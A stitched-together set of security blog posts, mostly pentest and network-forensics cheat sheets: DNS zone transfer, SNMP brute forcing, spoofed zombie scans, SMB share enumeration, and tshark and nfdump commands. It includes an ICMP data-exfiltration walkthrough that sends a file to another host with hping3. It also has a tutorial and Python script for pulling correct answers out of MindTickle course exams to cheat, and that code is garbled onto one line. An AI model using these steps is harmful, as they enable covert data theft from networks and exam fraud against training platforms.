sudo traceroute 10.10.10.10 -m 5
sudo route
Categorieën
Auteur: MSX
Categorieën
DNS Enumeration
DNS enumeration
—————
sudo nslookup
server 172.16.5.10 (ip-dns-server)
>172.16.5.5 (ip-discovered-host)
sudo dig @172.16.5.10 -x 172.16.5.5 +nocookie
DNS Zone Transfer
—————–
sudo dig @172.16.5.10 sportfoo.com -t AXFR +nocookie
Categorieën
snmp audit walkthrough
Discover SNMP running hosts
- nmap -sU -p 161 target-ip
Brute force community string
- onesixtyone -c /root/seclist target-ip
Enumerate snmp info on host
- snmpenum target-ip public windows.txt
hping3 -S -r -p 135 x.x.x.x
- -S TCP sync
- -r check for ID +
- -p target(open) port
hping3 -a zombie-ip -S -p 23 target-ip
- -a spoof source-ip
- -p target service
1. Install Firefox
2. Start your mindtickle course in the firefox browser
3. Open Web developer -> Web Console
4. This should open something like this:
5. Now select the Debugger tab and browse to the cf-**.mindtickle.com site icon and underlying folder structure 920xxx -> scormcontent -> lib -> index.html
6. Select “control +f” or “command +f” to search the index.html for window.courseData
7. Make sure to select and copy the complete Base64 Encoded text
8. Paste the Base64 Encoded text in an online decoder site such as https://www.base64decode.org/ and click on Decode to get the clear text result
9. Save the decoded text in a file and open it in your preferred editor
10. Now search for a question in your exam lookup the correct answer:
11. Finish your exam and end-up with a 100% score 😉
Now lets automate this further by leveraging a Python Script.
1. Follow the previous mentioned 5 steps but now download the index.html file:
2. Past the following python code in a file and save it with the .py extension:
import base64import jsoncorrectID = []answer_list = []print(”)print(“##########—–HELLO-CHEATER—–##########”)print(”)print(“Please provide full MidTickle index.html download path in single quotes”)print(“Example = ” + “‘//Users/YOURUSERNAME/Desktop/index.html'”)print(”)path = input(“Path = : “)print(”)with open(path) as search:for line in search:line = line.rstrip() # remove ‘\n’ at end of lineif’window.courseData’in line:data=(line).replace(‘window.courseData = ‘, ”).replace(‘”;’, ”)+'”‘encoded = datadecoded = base64.b64decode(encoded)json_array = json.loads(decoded)#print(“lessonCount”)###################lessonsCount = len(json_array[‘course’][‘lessons’])#print(lessonsCount)#print(“answerCount”)###################answercounter = 0for i in json_array[‘course’][‘lessons’]:if (i[‘type’] == ‘quiz’):breakanswercounter += 1#print(answercounter)#print(“itemCount”)####################itemcounter = len(json_array[‘course’][‘lessons’][answercounter][‘items’])#print(itemcounter)#print(“Correct ID’s: “)correctID_count = 0for item in json_array[‘course’][‘lessons’][answercounter][‘items’]:correctID_details = {“id”:None, “title”:None}correctID_details[‘id’] = item[‘correct’]correctID_details[‘title’] = item[‘title’]correctID.append(correctID_details)correctID_count = correctID_count + 1#print(correctID)#print(correctID_count)#print(“FullanswerList”)#####################j = itemcounterc = 0while (c < j):for item in json_array[‘course’][‘lessons’][answercounter][‘items’][c][‘answers’]:answer_details = {“id”:None, “title”:None}answer_details[‘id’] = item[‘id’]answer_details[‘title’] = item[‘title’]answer_list.append(answer_details)c = c + 1#print(answer_list)##################print(“###########################################”)print(“###-The-Correct-MindTickle-Answers-Are:-###”)print(“###########################################”)print(”)#############################for id in correctID:correct_id = id[‘id’]for x in answer_list:if x[‘id’] == correct_id:print(“Question: ” + id[‘title’] + ” “)print(“Answer : ” + x[‘title’])print(“——————————————-“)print(”)print(“#############——ENJOY—–##############”)print(“####-Created-By-MSX-@-Rootsecurity.nl-#####”)print(“#############–23/03/2020–################”)print(“###########################################”)
3. Execute the file in python like shown below
4. Enter the file location of the stored index.html file as shown below and click enter
5. Enjoy the output of questions and answers together
Scan for SMB hosts
- nmap -sS -p 139,445 target-ip/range
Run nbtscan to obtain netbios info
- nbtscan -v target-ip
* smbmap -H ip -u anonymous
* smbmap -H ip -u anonymous -r –depth 5
* smbmap -d domain -u user -p password -H x.x.x.x
* smbmap -d domain -u user -p password -H x.x.x.x -R sharename (list files in share)
* smbclient -c “recurse;ls” //x.x.x.x/SYSVOL -U domain\\user%password
* smbclient -L //ip
* smbclient \\\\IP\\ADMIN$ -U user
* get filename
* Copy Folders
smbclient ‘\\server\share’
mask “”
recurse ON
prompt OFF
cd ‘path\to\remote\dir’
lcd ‘~/path/to/download/to/’
mget *
Categorieën
NIKTO (web)
nikto -h ip -p 80
owasp-zap
* nmap –script-updatedb
* nmap -p 1-65535 -T4 -A -v
* nmap -p 1-65535 -sV -sS -T4 IP
* nmap -sC -sV -oA name ip
* nmap -T4 -A -sV -v3 -d -oA output –script all target
Ping scan on the local LAN
nmap -sn -n 10.100.13.0/24
Service scan on the alive hosts
nmap -Pn -sV -n 10.100.13.1,126 --script=smb-os-discovery.nse
/usr/share/nmap/scripts/
less name.nmap
- nmap -sS tcp sync
- nmap -sT full tcp
- nmap -sU udp
- nmap -oX output xml format
- xsltproc portscan.xml -o portscan.html
Zombie Scan
- find incremental fragmentation IP ID +1
- nmap -O -v -n ip
- if IP ID Sequence is incremental host is good
Use Zombie to scan other host
1.nmap -Pn -sI zombieip:openport targetip -p23 -v
ARP network discovery
sudo netdiscover -i tap0 -r 172.16.5.0/24
sudo nmap -PR -sn 172.16.5.*
Scan for DNS servers
sudo nmap -sT -p53 172.16.5.0/24
sudo nmap -sU -p53 172.16.5.0/24
sudo nmap -sV –script /usr/share/nmap/scripts/nmap-vulners.nse 192.168.68.112
Categorieën
Data exfiltration over ICMP
hping3 using kali linux
-E filename to send
-1 use ICMP
-u tell you when –file reached EOF and prevent rewind
-i send ICMP every 10 seconds (slow)
-d Destination IP
root@kali:~# hping3 -E dns2tcp.txt -1 -u -i 10 -d 95 192.168.20.106
HPING 192.168.20.106 (eth0 192.168.20.106): icmp mode set, 28 headers + 95 data bytes
[main] memlockall(): Success
Warning: can’t disable memory paging!
len=123 ip=192.168.20.106 ttl=128 id=27778 icmp_seq=0 rtt=3.2 ms
len=123 ip=192.168.20.106 ttl=128 id=27806 icmp_seq=1 rtt=3.1 ms
len=123 ip=192.168.20.106 ttl=128 id=27852 icmp_seq=2 rtt=2.9 ms
EOF reached, wait some second than press ctrl+c
len=123 ip=192.168.20.106 ttl=128 id=27877 icmp_seq=3 rtt=2.6 ms
Data in file send “dns2tcp.txt”
root@kali:~# cat dns2tcp.txt
Kalicat dns2tcpdrc
listen = 192.168.20.243
port = 53
user = nobody
chroot = /tmp/
domain = ns01.rootsecurity.info
resources = ssh:127.0.0.1:22
dns2tcpd -F -d 3 -f /dns2tcpdrc
Monitor on receiving end using Wireshark
icmp display filter
Categorieën
Network Forensics Tools & Commands
Sort & Uniq
| sort | uniq -c | sort -nr
tshark
tshark -r file -Y <display filter> -T fields -e <fieldname>
tshark -r /cases/*.pcap -Y ftp -T fields -e ip.src -e ip.dst | sort | uniq -c | sort –nr
- Identify search strings
tshark -n -r /cases/*.pcap -Y ‘http.host contains “google” and http.request’
- Determine POST to domain
tshark -n -r /cases/*.pcap -Y ‘http.host contains “dropbox.xom” and http.request.method == “POST”‘
- Observe content in frame number
tshark -n -x -r /cases/*.pcap -Y ‘frame.number==27757’
- Identify TCP stream number
tshark -n -x -r /cases/*.pcap -Y ‘frame.number==27757’ -T fields -e tcp.stream
- Extract base64 data from stream
tshark -n -r /cases/*.pcap -Y ‘tcp.stream==27757’ -T fields -e tcp.segment_data > /cases/extract.txt
- Analyse web url requests
tshark -n -r /cases/*.pcap -T fields -E separator=/t -e frame.number -e frame.time -e http.referer -e http.cookie -Y ‘http.request.uri contains “dropbox”‘
MD5SUM
md5sum cases.pcapl
TCPdump
sudo tcpdump -n -i eth0 -s 0 “arp”
sudo tcpdump -n -i eth0 -s 0 “arp and not ether dst ff:ff:ff:ff:ff:ff”
sudo tcpdump -n -i eth0 -s 0 -w /cases/scan.pcap
sudo tcpdump -n -i eth0 -s 0 -w /cases/scan.pcap “net 192.168.20.0/27”
Capinfos
- List pcap filename/md5/start/end – capture times
capinfos -T -H -a -e *.pcap /cases/*
Editcap
editcap -A ‘2015-11-15 00:00:00’ -B ‘2015-11-16 00:00:00:00’ /cases/*.pcap ~/smaller.pcap
Base64
- Encode to Base64
cat file | base64 > file.txt
- URL Base64 decode
Obtain base64 code from follow stream in wireshark and save to file
cat base64-from-url.txt | uridecode.py > native-base64.txt
decode base64 data in a new file
base64 -di native-base64.txt > decode-base64.bin
- check intended file type
file decode-base64.bin
unzip -t decode-base64.bin
certutil -decode file.txt test.exe
ARPScan
sudo arp-scan -l
Wireshark filters
arp and not eth.dst == ff:ff:ff:ff:ff:ff
http.request and http.host contains “google”
http.request.method == “post” and http.host contains “dropbox.com”
nfdump
- Order by amount of bytes, Aggregate on proto type
nfdump -O bytes -o extended -R cases/ ‘ip 8.8.8.8’ -A proto
- Show only session with SYN flag, order by packets, aggregate scr & dst ip’s
nfdump -O packets -R cases/ -A srcip,dstip ‘proto tcp and src ip 8.8.8.8 and flags S and not flags AFRPU’
- Example with custom format and filer
nfdump -O packets -A dstip -t ‘2015/07/15-2015/08/15’ -R cases/ -o ‘fmt:%da %pkt %fl %bpp’ ‘proto tcp and src ip 8.8.8.8 and flags S and not flags AFRPU and (dst ip 4.4.4.4 or dst ip 3.3.3.3 or dst ip 2.2.2.2)’
- Output formats
-o long, extended
-o “fmt:%sa %da”
| Tag | Description | Tag | Description |
| %ts | Start Time – first seen | %in | Input Interface num |
| %te | End Time – last seen | %out | Output Interface num |
| %td | Duration | %pkt | Packets |
| %pr | Protocol | %byt | Bytes |
| %sa | Source Address | %fl | Flows |
| %da | Destination Address | %pkt | Packets |
| %sap | Source Address:Port | %flg | TCP Flags |
| %dap | Destination Address:Port%tos | %tos | Tos |
| %sp | Source Port | %bps | bps – bits per second |
| %dp | Destination Port | %pps | pps – packets per second |
| %sas | Source AS | %bpp | bps – Bytes per package |
| %das | Destination AS |
-B flow direction based on port number >1024 client <1024 server
nfdump -B -O tstart -o extended -R 2013/ -o ‘fmt:%ts %te %sa %da %d’ ‘proto tcp and src ip 8.8.8.8 and flags S and not flags AFRPU’
Squid
/etc/squid/squid.conf
/var/log/squid/*
/var/spool/squid/*
–enable referrer
SMB protocol Wirieshark filters
SMB sessions active untill:
-The network connection times out
-The users closes the session
-The user de-authenticates
-The connection fails a server-side security check
Protocal Negotiation “smb.cmd == 0x72”
LANMAN/ NTLM negotiation
Session Establishment “smb.cmd == 0x73”
The spnego.negResult field indicates if authentication was successfull result = 0x00
Process ID # gives indication if authentication is initiated by a core system <1000 or user level process >1000
All sessions are uniquely identified by the Multiplex ID so client and server can pair reponse packets
When authentication is successful a USER ID is added which is only valid during the same SMB session
Accessing Service “smb.cmd == 0x75”
Request access to resource
Server checks, if successfull a Tree ID is added
Network Directory “smb.cmd == 0x32 && smb.trans2.cmd == 0x0005 && smb.qpi_loi == 1004”
Opening a file “smb.cmd == 0xa2”
If a client is permitted access to a file, the server returns a FID ID. This value should not be used to track file access instead use:
smb.cmd == 0xa2 and !smb.fid and smb.file
Create and Request “smb.cmd == 0xa2” and !smb.fid and smb.file
Locking file for access “smb.cmd == 0x24”
Reading from file “smb.cmd == 0x2e”
Closing a file “smb.cmd == 0x04”
Tree Disconnect “smb.cmd == 0x71”
Uses corresponding Tree ID
Logoff “smb.cmd == 0x74”
Uses corresponding UID & PID
| Process ID | smb.pid | smb.pid == 996 | smb.pid == 0x03e4 |
| User ID | smb.uid | ||
| Tree ID | smb.tid | ||
| File ID | smb.fid |
- Export objects from SMB in Wireshark
Wireshark -> File -> Export Objects -> SMB/SMB2
Collecting log evidence
Firewall files
/etc/sysconfig/iptables
/etc/sysconfig/iptables-config
/etc/rsyslog.conf
/var/log/messages*
IDS files
/etc/sysconfig/snort
/etc/snort/*
/etc/rsyslog.conf
/var/log/snort/*
Squid
/etc/squid/squid.conf
/var/log/squid/*
/var/spool/squid/*
Iptables
-d destination ip
-i input interface
-o output interface
-p layer 4 proto
–dport destination port
–syn match packets with only SYN flags
-j LOG Log matched traffic
-j REJECT Reject matched traffic
SSL Traffic
- Profile client encryption ciphers
tshark –n –r /cases/*pcap –Y ‘ssl.handshake.type == 1’ –T fields –e ip.src –e ssl.record.version –e ssl.handshake.ciphersuite > /cases/ssl_ciphersuites_by_ip.txt
cat /cases/ssl_ciphersuites_by_ip.txt | awk ‘{print $3}’ | sort | uniq –c | sort –nr
- Identify SSL certificate subject
tshark –n –r /cases/*pcap –Y ‘ssl.handshake.certificate’ –T fields –E separator=\ | -E aggregator=\ | -e x509ce.dNSName –e x509sat.teletexString –e x509sat.uTF8String –e x509sat.universalString –e x509sat.IA5String | tr –s \ | ‘\n’ | sort | uniq –c | sort –nr
NGREP
- Search PCAP for strings
ngrep -I dump6.pcap -w ‘root’ -N -t –q
- Search PCAP for hex value
ngrep -I dump6.pcap -xX ‘0xc5d5e5f55666768696a6b6c6d6e6’ -N -t –q
TCPXTRACT
- Extract files (auto file carving) from pcap
tcpxtract -f dump3.pcap
RootSecurity 